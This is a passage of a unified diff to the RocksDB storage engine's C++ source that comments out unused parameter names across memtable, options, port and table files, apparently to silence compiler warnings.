-void HashCuckooRep::Iterator::SeekForPrev(const Slice& user_key, - const char* memtable_key) { +void HashCuckooRep::Iterator::SeekForPrev(const Slice& /*user_key*/, + const char* /*memtable_key*/) { assert(false); } @@ -623,7 +623,7 @@ void HashCuckooRep::Iterator::SeekToLast() { MemTableRep* HashCuckooRepFactory::CreateMemTableRep( const MemTableRep::KeyComparator& compare, Allocator* allocator, - const SliceTransform* transform, Logger* logger) { + const SliceTransform* /*transform*/, Logger* /*logger*/) { // The estimated average fullness. The write performance of any close hash // degrades as the fullness of the mem-table increases. Setting kFullness // to a value around 0.7 can better avoid write performance degradation while diff --git a/memtable/hash_linklist_rep.cc b/memtable/hash_linklist_rep.cc index 932b62a3460..b23a9f5e51d 100644 --- a/memtable/hash_linklist_rep.cc +++ b/memtable/hash_linklist_rep.cc @@ -362,14 +362,14 @@ class HashLinkListRep : public MemTableRep { // Advance to the first entry with a key >= target virtual void Seek(const Slice& internal_key, - const char* memtable_key) override { + const char* /*memtable_key*/) override { node_ = hash_link_list_rep_->FindGreaterOrEqualInBucket(head_, internal_key); } // Retreat to the last entry with a key <= target - virtual void SeekForPrev(const Slice& internal_key, - const char* memtable_key) override { + virtual void SeekForPrev(const Slice& /*internal_key*/, + const char* /*memtable_key*/) override { // Since we do not support Prev() // We simply do not support SeekForPrev Reset(nullptr); @@ -483,10 +483,10 @@ class HashLinkListRep : public MemTableRep { } virtual void Next() override {} virtual void Prev() override {} - virtual void Seek(const Slice& user_key, - const char* memtable_key) override {} - virtual void SeekForPrev(const Slice& user_key, - const char* memtable_key) override {} + virtual void Seek(const Slice& /*user_key*/, + const char* /*memtable_key*/) override {} + virtual void SeekForPrev(const Slice& /*user_key*/, + const char* /*memtable_key*/) override {} virtual void SeekToFirst() override {} virtual void SeekToLast() override {} diff --git a/memtable/hash_skiplist_rep.cc b/memtable/hash_skiplist_rep.cc index e34743eb2c7..93082b1ec28 100644 --- a/memtable/hash_skiplist_rep.cc +++ b/memtable/hash_skiplist_rep.cc @@ -131,8 +131,8 @@ class HashSkipListRep : public MemTableRep { } // Retreat to the last entry with a key <= target - virtual void SeekForPrev(const Slice& internal_key, - const char* memtable_key) override { + virtual void SeekForPrev(const Slice& /*internal_key*/, + const char* /*memtable_key*/) override { // not supported assert(false); } @@ -219,10 +219,10 @@ class HashSkipListRep : public MemTableRep { } virtual void Next() override {} virtual void Prev() override {} - virtual void Seek(const Slice& internal_key, - const char* memtable_key) override {} - virtual void SeekForPrev(const Slice& internal_key, - const char* memtable_key) override {} + virtual void Seek(const Slice& /*internal_key*/, + const char* /*memtable_key*/) override {} + virtual void SeekForPrev(const Slice& /*internal_key*/, + const char* /*memtable_key*/) override {} virtual void SeekToFirst() override {} virtual void SeekToLast() override {} @@ -335,7 +335,7 @@ MemTableRep::Iterator* HashSkipListRep::GetDynamicPrefixIterator(Arena* arena) { MemTableRep* HashSkipListRepFactory::CreateMemTableRep( const MemTableRep::KeyComparator& compare, Allocator* allocator, - const SliceTransform* transform, Logger* logger) { + const SliceTransform* transform, Logger* /*logger*/) { return new HashSkipListRep(compare, allocator, transform, bucket_count_, skiplist_height_, skiplist_branching_factor_); } diff --git a/memtable/skiplistrep.cc b/memtable/skiplistrep.cc index f56be5dcb62..235d33b818d 100644 --- a/memtable/skiplistrep.cc +++ b/memtable/skiplistrep.cc @@ -270,7 +270,7 @@ class SkipListRep : public MemTableRep { MemTableRep* SkipListFactory::CreateMemTableRep( const MemTableRep::KeyComparator& compare, Allocator* allocator, - const SliceTransform* transform, Logger* logger) { + const SliceTransform* transform, Logger* /*logger*/) { return new SkipListRep(compare, allocator, transform, lookahead_); } diff --git a/memtable/vectorrep.cc b/memtable/vectorrep.cc index e54025c2d3d..378b29624af 100644 --- a/memtable/vectorrep.cc +++ b/memtable/vectorrep.cc @@ -227,8 +227,8 @@ void VectorRep::Iterator::Seek(const Slice& user_key, } // Advance to the first entry with a key <= target -void VectorRep::Iterator::SeekForPrev(const Slice& user_key, - const char* memtable_key) { +void VectorRep::Iterator::SeekForPrev(const Slice& /*user_key*/, + const char* /*memtable_key*/) { assert(false); } @@ -296,7 +296,7 @@ MemTableRep::Iterator* VectorRep::GetIterator(Arena* arena) { MemTableRep* VectorRepFactory::CreateMemTableRep( const MemTableRep::KeyComparator& compare, Allocator* allocator, - const SliceTransform*, Logger* logger) { + const SliceTransform*, Logger* /*logger*/) { return new VectorRep(compare, allocator, count_); } } // namespace rocksdb diff --git a/options/options_helper.cc b/options/options_helper.cc index 9e984f6e39e..82c734cba99 100644 --- a/options/options_helper.cc +++ b/options/options_helper.cc @@ -1129,7 +1129,7 @@ Status GetPlainTableOptionsFromMap( const PlainTableOptions& table_options, const std::unordered_map& opts_map, PlainTableOptions* new_table_options, bool input_strings_escaped, - bool ignore_unknown_options) { + bool /*ignore_unknown_options*/) { assert(new_table_options); *new_table_options = table_options; for (const auto& o : opts_map) { diff --git a/options/options_parser.cc b/options/options_parser.cc index d5a3fec6ef0..fc4e119f3db 100644 --- a/options/options_parser.cc +++ b/options/options_parser.cc @@ -689,7 +689,7 @@ Status RocksDBOptionsParser::VerifyRocksDBOptionsFromFile( Status RocksDBOptionsParser::VerifyDBOptions( const DBOptions& base_opt, const DBOptions& persisted_opt, - const std::unordered_map* opt_map, + const std::unordered_map* /*opt_map*/, OptionsSanityCheckLevel sanity_check_level) { for (auto pair : db_options_type_info) { if (pair.second.verification == OptionVerificationType::kDeprecated) { diff --git a/port/port_posix.cc b/port/port_posix.cc index 59241daff44..e3af7726024 100644 --- a/port/port_posix.cc +++ b/port/port_posix.cc @@ -35,7 +35,7 @@ static int PthreadCall(const char* label, int result) { return result; } -Mutex::Mutex(bool adaptive) { +Mutex::Mutex(bool /*adaptive*/) { #ifdef ROCKSDB_PTHREAD_ADAPTIVE_MUTEX if (!adaptive) { PthreadCall("init mutex", pthread_mutex_init(&mu_, nullptr)); diff --git a/port/stack_trace.cc b/port/stack_trace.cc index baaf140142d..6f657be51b2 100644 --- a/port/stack_trace.cc +++ b/port/stack_trace.cc @@ -13,7 +13,7 @@ namespace rocksdb { namespace port { void InstallStackTraceHandler() {} -void PrintStack(int first_frames_to_skip) {} +void PrintStack(int /*first_frames_to_skip*/) {} } // namespace port } // namespace rocksdb diff --git a/table/adaptive_table_factory.cc b/table/adaptive_table_factory.cc index f83905dff3a..173bca71c1b 100644 --- a/table/adaptive_table_factory.cc +++ b/table/adaptive_table_factory.cc @@ -44,7 +44,7 @@ Status AdaptiveTableFactory::NewTableReader( const TableReaderOptions& table_reader_options, unique_ptr&& file, uint64_t file_size, unique_ptr* table, - bool prefetch_index_and_filter_in_cache) const { + bool /*prefetch_index_and_filter_in_cache*/) const { Footer footer; auto s = ReadFooterFromFile(file.get(), file_size, &footer); if (!s.ok()) { diff --git a/table/adaptive_table_factory.h b/table/adaptive_table_factory.h index b7b52ba96fc..00af6a76e95 100644 --- a/table/adaptive_table_factory.h +++ b/table/adaptive_table_factory.h @@ -44,8 +44,9 @@ class AdaptiveTableFactory : public TableFactory { uint32_t column_family_id, WritableFileWriter* file) const override; // Sanitizes the specified DB Options. - Status SanitizeOptions(const DBOptions& db_opts, - const ColumnFamilyOptions& cf_opts) const override { + Status SanitizeOptions( + const DBOptions& /*db_opts*/, + const ColumnFamilyOptions& /*cf_opts*/) const override { return Status::OK(); } diff --git a/table/block_based_filter_block.cc b/table/block_based_filter_block.cc index 697c11a42f0..a09f1a0e0af 100644 --- a/table/block_based_filter_block.cc +++ b/table/block_based_filter_block.cc @@ -113,7 +113,7 @@ inline void BlockBasedFilterBlockBuilder::AddPrefix(const Slice& key) { } } -Slice BlockBasedFilterBlockBuilder::Finish(const BlockHandle& tmp, +Slice BlockBasedFilterBlockBuilder::Finish(const BlockHandle& /*tmp*/, Status* status) { // In this impl we ignore BlockHandle *status = Status::OK(); @@ -185,8 +185,8 @@ BlockBasedFilterBlockReader::BlockBasedFilterBlockReader( } bool BlockBasedFilterBlockReader::KeyMayMatch( - const Slice& key, uint64_t block_offset, const bool no_io, - const Slice* const const_ikey_ptr) { + const Slice& key, uint64_t block_offset, const bool /*no_io*/, + const Slice* const /*const_ikey_ptr*/) { assert(block_offset != kNotValid); if (!whole_key_filtering_) { return true; @@ -195,8 +195,8 @@ bool BlockBasedFilterBlockReader::KeyMayMatch( } bool BlockBasedFilterBlockReader::PrefixMayMatch( - const Slice& prefix, uint64_t block_offset, const bool no_io, - const Slice* const const_ikey_ptr) { + const Slice& prefix, uint64_t block_offset, const bool /*no_io*/, + const Slice* const /*const_ikey_ptr*/) { assert(block_offset != kNotValid); if (!prefix_extractor_) { return true; diff --git a/table/block_based_table_builder.cc b/table/block_based_table_builder.cc index e87def73e7e..594fd92fce1 100644 --- a/table/block_based_table_builder.cc +++ b/table/block_based_table_builder.cc @@ -209,8 +209,8 @@ class BlockBasedTableBuilder::BlockBasedTablePropertiesCollector whole_key_filtering_(whole_key_filtering), prefix_filtering_(prefix_filtering) {} - virtual Status InternalAdd(const Slice& key, const Slice& value, - uint64_t file_size) override { + virtual Status InternalAdd(const Slice& /*key*/, const Slice& /*value*/, + uint64_t /*file_size*/) override { // Intentionally left blank. Have no interest in collecting stats for // individual key/value pairs. return Status::OK(); @@ -585,7 +585,7 @@ Status BlockBasedTableBuilder::status() const { return rep_->status; } -static void DeleteCachedBlock(const Slice& key, void* value) { +static void DeleteCachedBlock(const Slice& /*key*/, void* value) { Block* block = reinterpret_cast(value); delete block; } diff --git a/table/block_based_table_factory.cc b/table/block_based_table_factory.cc index 4705046bfeb..3620db1416e 100644 --- a/table/block_based_table_factory.cc +++ b/table/block_based_table_factory.cc @@ -82,8 +82,7 @@ TableBuilder* BlockBasedTableFactory::NewTableBuilder( } Status BlockBasedTableFactory::SanitizeOptions( - const DBOptions& db_opts, - const ColumnFamilyOptions& cf_opts) const { + const DBOptions& /*db_opts*/, const ColumnFamilyOptions& cf_opts) const { if (table_options_.index_type == BlockBasedTableOptions::kHashSearch && cf_opts.prefix_extractor == nullptr) { return Status::InvalidArgument("Hash index is specified for block-based " diff --git a/table/block_based_table_reader.cc b/table/block_based_table_reader.cc index 123e1814ab7..5ac1300789c 100644 --- a/table/block_based_table_reader.cc +++ b/table/block_based_table_reader.cc @@ -91,13 +91,13 @@ Status ReadBlockFromFile(RandomAccessFileReader* file, const Footer& footer, // Delete the resource that is held by the iterator. template -void DeleteHeldResource(void* arg, void* ignored) { +void DeleteHeldResource(void* arg, void* /*ignored*/) { delete reinterpret_cast(arg); } // Delete the entry resided in the cache. template -void DeleteCachedEntry(const Slice& key, void* value) { +void DeleteCachedEntry(const Slice& /*key*/, void* value) { auto entry = reinterpret_cast(value); delete entry; } @@ -179,8 +179,8 @@ class PartitionIndexReader : public IndexReader, public Cleanable { } // return a two-level iterator: first level is on the partition index - virtual InternalIterator* NewIterator(BlockIter* iter = nullptr, - bool dont_care = true) override { + virtual InternalIterator* NewIterator(BlockIter* /*iter*/ = nullptr, + bool /*dont_care*/ = true) override { // Filters are already checked before seeking the index const bool skip_filters = true; const bool is_index = true; @@ -259,7 +259,7 @@ class BinarySearchIndexReader : public IndexReader { } virtual InternalIterator* NewIterator(BlockIter* iter = nullptr, - bool dont_care = true) override { + bool /*dont_care*/ = true) override { return index_block_->NewIterator(icomparator_, iter, true); } @@ -294,7 +294,7 @@ class HashIndexReader : public IndexReader { const BlockHandle& index_handle, InternalIterator* meta_index_iter, IndexReader** index_reader, - bool hash_index_allow_collision, + bool /*hash_index_allow_collision*/, const PersistentCacheOptions& cache_options) { std::unique_ptr index_block; auto s = ReadBlockFromFile( @@ -941,7 +941,7 @@ Status BlockBasedTable::GetDataBlockFromCache( Status BlockBasedTable::PutDataBlockToCache( const Slice& block_cache_key, const Slice& compressed_block_cache_key, Cache* block_cache, Cache* block_cache_compressed, - const ReadOptions& read_options, const ImmutableCFOptions& ioptions, + const ReadOptions& /*read_options*/, const ImmutableCFOptions& ioptions, CachableEntry* block, Block* raw_block, uint32_t format_version, const Slice& compression_dict, size_t read_amp_bytes_per_bit, bool is_index, Cache::Priority priority) { @@ -2257,7 +2257,7 @@ void BlockBasedTable::DumpKeyValue(const Slice& key, const Slice& value, namespace { -void DeleteCachedFilterEntry(const Slice& key, void* value) { +void DeleteCachedFilterEntry(const Slice& /*key*/, void* value) { FilterBlockReader* filter = reinterpret_cast(value); if (filter->statistics() != nullptr) { RecordTick(filter->statistics(), BLOCK_CACHE_FILTER_BYTES_EVICT, @@ -2266,7 +2266,7 @@ void DeleteCachedFilterEntry(const Slice& key, void* value) { delete filter; } -void DeleteCachedIndexEntry(const Slice& key, void* value) { +void DeleteCachedIndexEntry(const Slice& /*key*/, void* value) { IndexReader* index_reader = reinterpret_cast(value); if (index_reader->statistics() != nullptr) { RecordTick(index_reader->statistics(), BLOCK_CACHE_INDEX_BYTES_EVICT, diff --git a/table/block_test.cc b/table/block_test.cc index f5c543975f4..0258be4866c 100644 --- a/table/block_test.cc +++ b/table/block_test.cc @@ -133,7 +133,7 @@ TEST_F(BlockTest, SimpleTest) { BlockContents GetBlockContents(std::unique_ptr *builder, const std::vector &keys, const std::vector &values, - const int prefix_group_size = 1) { + const int /*prefix_group_size*/ = 1) { builder->reset(new BlockBuilder(1 /* restart interval */)); // Add only half of the keys diff --git a/table/cuckoo_table_builder_test.cc b/table/cuckoo_table_builder_test.cc index ec282b4b540..dfd80c22a5a 100644 --- a/table/cuckoo_table_builder_test.cc +++ b/table/cuckoo_table_builder_test.cc @@ -23,7 +23,7 @@ namespace { std::unordered_map> hash_map; uint64_t GetSliceHash(const Slice& s, uint32_t index, - uint64_t max_num_buckets) { + uint64_t /*max_num_buckets*/) { return hash_map[s.ToString()][index]; } } // namespace diff --git a/table/cuckoo_table_factory.cc b/table/cuckoo_table_factory.cc index 2325bcf77c4..84d22468eb9 100644 --- a/table/cuckoo_table_factory.cc +++ b/table/cuckoo_table_factory.cc @@ -16,7 +16,7 @@ Status CuckooTableFactory::NewTableReader( const TableReaderOptions& table_reader_options, unique_ptr&& file, uint64_t file_size, std::unique_ptr* table, - bool prefetch_index_and_filter_in_cache) const { + bool /*prefetch_index_and_filter_in_cache*/) const { std::unique_ptr new_reader(new CuckooTableReader( table_reader_options.ioptions, std::move(file), file_size, table_reader_options.internal_comparator.user_comparator(), nullptr)); diff --git a/table/cuckoo_table_factory.h b/table/cuckoo_table_factory.h index 774dc3c3e80..e3371563fb5 100644 --- a/table/cuckoo_table_factory.h +++ b/table/cuckoo_table_factory.h @@ -67,8 +67,9 @@ class CuckooTableFactory : public TableFactory { uint32_t column_family_id, WritableFileWriter* file) const override; // Sanitizes the specified DB Options. - Status SanitizeOptions(const DBOptions& db_opts, - const ColumnFamilyOptions& cf_opts) const override { + Status SanitizeOptions( + const DBOptions& /*db_opts*/, + const ColumnFamilyOptions& /*cf_opts*/) const override { return Status::OK(); } diff --git a/table/cuckoo_table_reader.cc b/table/cuckoo_table_reader.cc index 85670ad1daf..47d58753c0a 100644 --- a/table/cuckoo_table_reader.cc +++ b/table/cuckoo_table_reader.cc @@ -127,8 +127,9 @@ CuckooTableReader::CuckooTableReader( status_ = file_->Read(0, file_size, &file_data_, nullptr); } -Status CuckooTableReader::Get(const ReadOptions& readOptions, const Slice& key, - GetContext* get_context, bool skip_filters) { +Status CuckooTableReader::Get(const ReadOptions& /*readOptions*/, + const Slice& key, GetContext* get_context, + bool /*skip_filters*/) { assert(key.size() == key_length_ + (is_last_level_ ? 8 : 0)); Slice user_key = ExtractUserKey(key); for (uint32_t hash_cnt = 0; hash_cnt < num_hash_func_; ++hash_cnt) { @@ -299,7 +300,7 @@ void CuckooTableIterator::Seek(const Slice& target) { PrepareKVAtCurrIdx(); } -void CuckooTableIterator::SeekForPrev(const Slice& target) { +void CuckooTableIterator::SeekForPrev(const Slice& /*target*/) { // Not supported assert(false); } @@ -364,8 +365,8 @@ extern InternalIterator* NewErrorInternalIterator(const Status& status, Arena* arena); InternalIterator* CuckooTableReader::NewIterator( - const ReadOptions& read_options, Arena* arena, - const InternalKeyComparator* icomp, bool skip_filters) { + const ReadOptions& /*read_options*/, Arena* arena, + const InternalKeyComparator* /*icomp*/, bool /*skip_filters*/) { if (!status().ok()) { return NewErrorInternalIterator( Status::Corruption("CuckooTableReader status is not okay."), arena); diff --git a/table/cuckoo_table_reader.h b/table/cuckoo_table_reader.h index f2b6d1a9cfe..fdb18beb939 100644 --- a/table/cuckoo_table_reader.h +++ b/table/cuckoo_table_reader.h @@ -55,7 +55,7 @@ class CuckooTableReader: public TableReader { size_t ApproximateMemoryUsage() const override; // Following methods are not implemented for Cuckoo Table Reader - uint64_t ApproximateOffsetOf(const Slice& key) override { return 0; } + uint64_t ApproximateOffsetOf(const Slice& /*key*/) override { return 0; } void SetupForCompaction() override {} // End of methods not implemented. diff --git a/table/cuckoo_table_reader_test.cc b/table/cuckoo_table_reader_test.cc index 7e131e56e31..a012bceeb7a 100644 --- a/table/cuckoo_table_reader_test.cc +++ b/table/cuckoo_table_reader_test.cc @@ -61,7 +61,7 @@ void AddHashLookups(const std::string& s, uint64_t bucket_id, } uint64_t GetSliceHash(const Slice& s, uint32_t index, - uint64_t max_num_buckets) { + uint64_t /*max_num_buckets*/) { return hash_map[s.ToString()][index]; } } // namespace diff --git a/table/full_filter_block.cc b/table/full_filter_block.cc index 5739494e8dd..448b827847b 100644 --- a/table/full_filter_block.cc +++ b/table/full_filter_block.cc @@ -43,7 +43,8 @@ inline void FullFilterBlockBuilder::AddPrefix(const Slice& key) { AddKey(prefix); } -Slice FullFilterBlockBuilder::Finish(const BlockHandle& tmp, Status* status) { +Slice FullFilterBlockBuilder::Finish(const BlockHandle& /*tmp*/, + Status* status) { // In this impl we ignore BlockHandle *status = Status::OK(); if (num_added_ != 0) { @@ -74,8 +75,8 @@ FullFilterBlockReader::FullFilterBlockReader( } bool FullFilterBlockReader::KeyMayMatch(const Slice& key, uint64_t block_offset, - const bool no_io, - const Slice* const const_ikey_ptr) { + const bool /*no_io*/, + const Slice* const /*const_ikey_ptr*/) { assert(block_offset == kNotValid); if (!whole_key_filtering_) { return true; @@ -83,10 +84,9 @@ bool FullFilterBlockReader::KeyMayMatch(const Slice& key, uint64_t block_offset, return MayMatch(key); } -bool FullFilterBlockReader::PrefixMayMatch(const Slice& prefix, - uint64_t block_offset, - const bool no_io, - const Slice* const const_ikey_ptr) { +bool FullFilterBlockReader::PrefixMayMatch( + const Slice& prefix, uint64_t block_offset, const bool /*no_io*/, + const Slice* const /*const_ikey_ptr*/) { assert(block_offset == kNotValid); if (!prefix_extractor_) { return true; diff --git a/table/full_filter_block.h b/table/full_filter_block.h index be27c58b61d..e161d079e54 100644 --- a/table/full_filter_block.h +++ b/table/full_filter_block.h @@ -43,7 +43,7 @@ class FullFilterBlockBuilder : public FilterBlockBuilder { ~FullFilterBlockBuilder() {} virtual bool IsBlockBased() override { return false; } - virtual void StartBlock(uint64_t block_offset) override {} + virtual void StartBlock(uint64_t /*block_offset*/) override {} virtual void Add(const Slice& key) override; virtual Slice Finish(const BlockHandle& tmp, Status* status) override; using FilterBlockBuilder::Finish; diff --git a/table/get_context.cc b/table/get_context.cc index 0d688fe4609..aacf5d5bdf4 100644 --- a/table/get_context.cc +++ b/table/get_context.cc @@ -73,7 +73,7 @@ void GetContext::MarkKeyMayExist() { } } -void GetContext::SaveValue(const Slice& value, SequenceNumber seq) { +void GetContext::SaveValue(const Slice& value, SequenceNumber /*seq*/) { assert(state_ == kNotFound); appendToReplayLog(replay_log_, kTypeValue, value); diff --git a/table/index_builder.h b/table/index_builder.h index d591e0e533c..3793cebc258 100644 --- a/table/index_builder.h +++ b/table/index_builder.h @@ -69,7 +69,7 @@ class IndexBuilder { // This method will be called whenever a key is added. The subclasses may // override OnKeyAdded() if they need to collect additional information. - virtual void OnKeyAdded(const Slice& key) {} + virtual void OnKeyAdded(const Slice& /*key*/) {} // Inform the index builder that all entries has been written. Block builder // may therefore perform any operation required for block finalization. @@ -137,7 +137,7 @@ class ShortenedIndexBuilder : public IndexBuilder { using IndexBuilder::Finish; virtual Status Finish( IndexBlocks* index_blocks, - const BlockHandle& last_partition_block_handle) override { + const BlockHandle& /*last_partition_block_handle*/) override { index_blocks->index_block_contents = index_block_builder_.Finish(); return Status::OK(); } diff --git a/table/internal_iterator.h b/table/internal_iterator.h index 2bfdb7d952a..3dc8f926580 100644 --- a/table/internal_iterator.h +++ b/table/internal_iterator.h @@ -74,7 +74,8 @@ class InternalIterator : public Cleanable { // but for Iterators that need to communicate with PinnedIteratorsManager // they will implement this function and use the passed pointer to communicate // with PinnedIteratorsManager. - virtual void SetPinnedItersMgr(PinnedIteratorsManager* pinned_iters_mgr) {} + virtual void SetPinnedItersMgr(PinnedIteratorsManager* /*pinned_iters_mgr*/) { + } // If true, this means that the Slice returned by key() is valid as long as // PinnedIteratorsManager::ReleasePinnedData is not called and the @@ -91,7 +92,7 @@ class InternalIterator : public Cleanable { // Iterator is not deleted. virtual bool IsValuePinned() const { return false; } - virtual Status GetProperty(std::string prop_name, std::string* prop) { + virtual Status GetProperty(std::string /*prop_name*/, std::string* /*prop*/) { return Status::NotSupported(""); } diff --git a/table/iterator.cc b/table/iterator.cc index 23a84b59e0f..295bf8b9cfe 100644 --- a/table/iterator.cc +++ b/table/iterator.cc @@ -98,8 +98,8 @@ class EmptyIterator : public Iterator { public: explicit EmptyIterator(const Status& s) : status_(s) { } virtual bool Valid() const override { return false; } - virtual void Seek(const Slice& target) override {} - virtual void SeekForPrev(const Slice& target) override {} + virtual void Seek(const Slice& /*target*/) override {} + virtual void SeekForPrev(const Slice& /*target*/) override {} virtual void SeekToFirst() override {} virtual void SeekToLast() override {} virtual void Next() override { assert(false); } @@ -122,8 +122,8 @@ class EmptyInternalIterator : public InternalIterator { public: explicit EmptyInternalIterator(const Status& s) : status_(s) {} virtual bool Valid() const override { return false; } - virtual void Seek(const Slice& target) override {} - virtual void SeekForPrev(const Slice& target) override {} + virtual void Seek(const Slice& /*target*/) override {} + virtual void SeekForPrev(const Slice& /*target*/) override {} virtual void SeekToFirst() override {} virtual void SeekToLast() override {} virtual void Next() override { assert(false); } diff --git a/table/mock_table.cc b/table/mock_table.cc index 4c9907e4599..4e8511031c4 100644 --- a/table/mock_table.cc +++ b/table/mock_table.cc @@ -27,14 +27,14 @@ stl_wrappers::KVMap MakeMockFile( } InternalIterator* MockTableReader::NewIterator(const ReadOptions&, - Arena* arena, + Arena* /*arena*/, const InternalKeyComparator*, - bool skip_filters) { + bool /*skip_filters*/) { return new MockTableIterator(table_); } Status MockTableReader::Get(const ReadOptions&, const Slice& key, - GetContext* get_context, bool skip_filters) { + GetContext* get_context, bool /*skip_filters*/) { std::unique_ptr iter(new MockTableIterator(table_)); for (iter->Seek(key); iter->Valid(); iter->Next()) { ParsedInternalKey parsed_key; @@ -57,10 +57,10 @@ std::shared_ptr MockTableReader::GetTableProperties() MockTableFactory::MockTableFactory() : next_id_(1) {} Status MockTableFactory::NewTableReader( - const TableReaderOptions& table_reader_options, - unique_ptr&& file, uint64_t file_size, + const TableReaderOptions& /*table_reader_options*/, + unique_ptr&& file, uint64_t /*file_size*/, unique_ptr* table_reader, - bool prefetch_index_and_filter_in_cache) const { + bool /*prefetch_index_and_filter_in_cache*/) const { uint32_t id = GetIDFromFile(file.get()); MutexLock lock_guard(&file_system_.mutex); @@ -76,8 +76,8 @@ Status MockTableFactory::NewTableReader( } TableBuilder* MockTableFactory::NewTableBuilder( - const TableBuilderOptions& table_builder_options, uint32_t column_family_id, - WritableFileWriter* file) const { + const TableBuilderOptions& /*table_builder_options*/, + uint32_t /*column_family_id*/, WritableFileWriter* file) const { uint32_t id = GetAndWriteNextID(file); return new MockTableBuilder(id, &file_system_); diff --git a/table/mock_table.h b/table/mock_table.h index 9e5396341c5..eca85d1b26c 100644 --- a/table/mock_table.h +++ b/table/mock_table.h @@ -46,7 +46,7 @@ class MockTableReader : public TableReader { Status Get(const ReadOptions&, const Slice& key, GetContext* get_context, bool skip_filters = false) override; - uint64_t ApproximateOffsetOf(const Slice& key) override { return 0; } + uint64_t ApproximateOffsetOf(const Slice& /*key*/) override { return 0; } virtual size_t ApproximateMemoryUsage() const override { return 0; } @@ -169,8 +169,8 @@ class MockTableFactory : public TableFactory { stl_wrappers::KVMap file_contents); virtual Status SanitizeOptions( - const DBOptions& db_opts, - const ColumnFamilyOptions& cf_opts) const override { + const DBOptions& /*db_opts*/, + const ColumnFamilyOptions& /*cf_opts*/) const override { return Status::OK(); } diff --git a/table/partitioned_filter_block.cc b/table/partitioned_filter_block.cc index 2b330039e50..6a491ad9f06 100644 --- a/table/partitioned_filter_block.cc +++ b/table/partitioned_filter_block.cc @@ -87,7 +87,7 @@ Slice PartitionedFilterBlockBuilder::Finish( PartitionedFilterBlockReader::PartitionedFilterBlockReader( const SliceTransform* prefix_extractor, bool _whole_key_filtering, - BlockContents&& contents, FilterBitsReader* filter_bits_reader, + BlockContents&& contents, FilterBitsReader* /*filter_bits_reader*/, Statistics* stats, const Comparator& comparator, const BlockBasedTable* table) : FilterBlockReader(contents.data.size(), stats, _whole_key_filtering), diff --git a/table/partitioned_filter_block_test.cc b/table/partitioned_filter_block_test.cc index a49143dae2f..86d31a4a703 100644 --- a/table/partitioned_filter_block_test.cc +++ b/table/partitioned_filter_block_test.cc @@ -25,8 +25,8 @@ class MockedBlockBasedTable : public BlockBasedTable { explicit MockedBlockBasedTable(Rep* rep) : BlockBasedTable(rep) {} virtual CachableEntry GetFilter( - const BlockHandle& filter_blk_handle, const bool is_a_filter_partition, - bool no_io) const override { + const BlockHandle& filter_blk_handle, + const bool /*is_a_filter_partition*/, bool /*no_io*/) const override { Slice slice = slices[filter_blk_handle.offset()]; auto obj = new FullFilterBlockReader( nullptr, true, BlockContents(slice, false, kNoCompression), diff --git a/table/plain_table_factory.cc b/table/plain_table_factory.cc index eadc2c0995f..7a07de731e4 100644 --- a/table/plain_table_factory.cc +++ b/table/plain_table_factory.cc @@ -18,7 +18,7 @@ Status PlainTableFactory::NewTableReader( const TableReaderOptions& table_reader_options, unique_ptr&& file, uint64_t file_size, unique_ptr* table, - bool prefetch_index_and_filter_in_cache) const { + bool /*prefetch_index_and_filter_in_cache*/) const { return PlainTableReader::Open( table_reader_options.ioptions, table_reader_options.env_options, table_reader_options.internal_comparator, std::move(file), file_size, diff --git a/table/plain_table_factory.h b/table/plain_table_factory.h index 33cd3134719..37c120a0fa6 100644 --- a/table/plain_table_factory.h +++ b/table/plain_table_factory.h @@ -163,8 +163,9 @@ class PlainTableFactory : public TableFactory { static const char kValueTypeSeqId0 = char(0xFF); // Sanitizes the specified DB Options. - Status SanitizeOptions(const DBOptions& db_opts, - const ColumnFamilyOptions& cf_opts) const override { + Status SanitizeOptions( + const DBOptions& /*db_opts*/, + const ColumnFamilyOptions& /*cf_opts*/) const override { return Status::OK(); } diff --git a/table/plain_table_key_coding.cc b/table/plain_table_key_coding.cc index 3e87c03d13f..6f5ee9b4ad2 100644 --- a/table/plain_table_key_coding.cc +++ b/table/plain_table_key_coding.cc @@ -288,7 +288,7 @@ Status PlainTableKeyDecoder::NextPlainEncodingKey(uint32_t start_offset, ParsedInternalKey* parsed_key, Slice* internal_key, uint32_t* bytes_read, - bool* seekable) { + bool* /*seekable*/) { uint32_t user_key_size = 0; Status s; if (fixed_user_key_len_ != kPlainTableVariableLength) { diff --git a/table/plain_table_reader.cc b/table/plain_table_reader.cc index 0f9449e8669..8089dcd0798 100644 --- a/table/plain_table_reader.cc +++ b/table/plain_table_reader.cc @@ -192,7 +192,7 @@ void PlainTableReader::SetupForCompaction() { InternalIterator* PlainTableReader::NewIterator(const ReadOptions& options, Arena* arena, const InternalKeyComparator*, - bool skip_filters) { + bool /*skip_filters*/) { bool use_prefix_seek = !IsTotalOrderMode() && !options.total_order_seek; if (arena == nullptr) { return new PlainTableIterator(this, use_prefix_seek); @@ -537,8 +537,8 @@ void PlainTableReader::Prepare(const Slice& target) { } } -Status PlainTableReader::Get(const ReadOptions& ro, const Slice& target, - GetContext* get_context, bool skip_filters) { +Status PlainTableReader::Get(const ReadOptions& /*ro*/, const Slice& target, + GetContext* get_context, bool /*skip_filters*/) { // Check bloom filter first. Slice prefix_slice; uint32_t prefix_hash; @@ -602,7 +602,7 @@ Status PlainTableReader::Get(const ReadOptions& ro, const Slice& target, return Status::OK(); } -uint64_t PlainTableReader::ApproximateOffsetOf(const Slice& key) { +uint64_t PlainTableReader::ApproximateOffsetOf(const Slice& /*key*/) { return 0; } @@ -706,7 +706,7 @@ void PlainTableIterator::Seek(const Slice& target) { } } -void PlainTableIterator::SeekForPrev(const Slice& target) { +void PlainTableIterator::SeekForPrev(const Slice& /*target*/) { assert(false); status_ = Status::NotSupported("SeekForPrev() is not supported in PlainTable"); diff --git a/table/sst_file_writer_collectors.h b/table/sst_file_writer_collectors.h index ce3a45f5a74..89e0970d816 100644 --- a/table/sst_file_writer_collectors.h +++ b/table/sst_file_writer_collectors.h @@ -26,8 +26,8 @@ class SstFileWriterPropertiesCollector : public IntTblPropCollector { SequenceNumber global_seqno) : version_(version), global_seqno_(global_seqno) {} - virtual Status InternalAdd(const Slice& key, const Slice& value, - uint64_t file_size) override { + virtual Status InternalAdd(const Slice& /*key*/, const Slice& /*value*/, + uint64_t /*file_size*/) override { // Intentionally left blank. Have no interest in collecting stats for // individual key/value pairs. return Status::OK(); @@ -68,7 +68,7 @@ class SstFileWriterPropertiesCollectorFactory : version_(version), global_seqno_(global_seqno) {} virtual IntTblPropCollector* CreateIntTblPropCollector( - uint32_t column_family_id) override { + uint32_t /*column_family_id*/) override { return new 